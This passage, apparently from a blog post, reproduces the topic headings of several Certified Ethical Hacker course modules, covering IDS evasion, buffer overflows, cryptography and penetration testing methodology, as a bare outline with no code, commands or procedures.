    • Scanning Networks
    • Mapping Networks
    • Password Cracking in Linux
    • Linux Vulnerabilities
    • SARA

    •    TARA
    •    Sniffing
    •    A Pinger in Disguise
    •    Session Hijacking
    •    Linux Rootkits
    •    Linux Security Countermeasures
    •    IPChains and IPTables
    Certified Ethical Hacker (CEH) Module 19: IDS, Firewalls and Honeypots
    • Intrusion Detection System
    • System Integrity Verifiers
    • How are Intrusions Detected?
    • Anomaly Detection
    • Signature Recognition
    • How does IDS match Signatures with Incoming Traffic?
    • Protocol Stack Verification
    • Application Protocol Verification
    • What Happens after an IDS Detects an Attack?
    • IDS Software Vendors
    • SNORT
    • Evading IDS (Techniques)
    • Complex IDS Evasion
    • Hacking Tool: fragrouter
    • Hacking Tool: TCPReplay
    • Hacking Tool: SideStep
    • Hacking Tool: NIDSbench
    • Hacking Tool: ADMutate
    • IDS Detection
    • Tools to Detect Packet Sniffers
    • Tools to inject strangely formatted packets onto the wire
    • Hacking Through Firewalls
    • Placing Backdoors through Firewalls
    • Hiding behind Covert Channels
    • Hacking Tool: Ncovert
    • What is a Honeypot?
    • Honeypots Evasion
    • Honeypots vendors
    • Hacking Tool: Honeyd

    Certified Ethical Hacker (CEH) Module 20: Buffer Overflows
    • What is a Buffer Overflow?
    • Exploitation
    • Assembly Language Basics
    • How to Detect Buffer Overflows in a Program?
    • Skills Required
    • CPU/OS Dependency
    • Understanding Stacks
    • Stack Based Buffer Overflows

    •   Buffer Overflow Technical Implementation
    •   Writing your own Buffer Overflow Exploit in C
    •   Defense against Buffer Overflows
    •   Type Checking Tools for Compiling Programs
    •   StackGuard
    •   Immunix
    Certified Ethical Hacker (CEH) Module 21: Cryptography
    • What is PKI?
    • Digital Certificates
    • RSA
    • MD-5
    • RC-5
    • SHA
    • SSL
    • PGP
    • SSH
    • Encryption Cracking Techniques

    Certified Ethical Hacker (CEH) Module 22: Penetration Testing Methodologies
    • Physical Security Testing
    • Port Scanning Testing
    • System Identification Testing
    • Services Identification Testing
    • Vulnerability Research and Verification Testing
    • Application Testing and Source Code Review
    • Router Testing
    • Firewall Testing
    • Intrusion Detection System Testing
    • Domain Trusted Systems Testing





    •   Application Password Cracking Testing
    •   Denial of Service Testing
    •   Containment Measures Testing
    •   Information Security
    •   Document Grinding
    •   Gathering Competitive Intelligence
    •   Social Engineering Testing
    •   Wireless Networks Testing
    •   Cordless Communications Testing
    •   Infrared Systems Testing
    •   Modem Testing
    •   Writing Penetration Testing Reports

    0 comments:

    Subscribe to: Posts (Atom)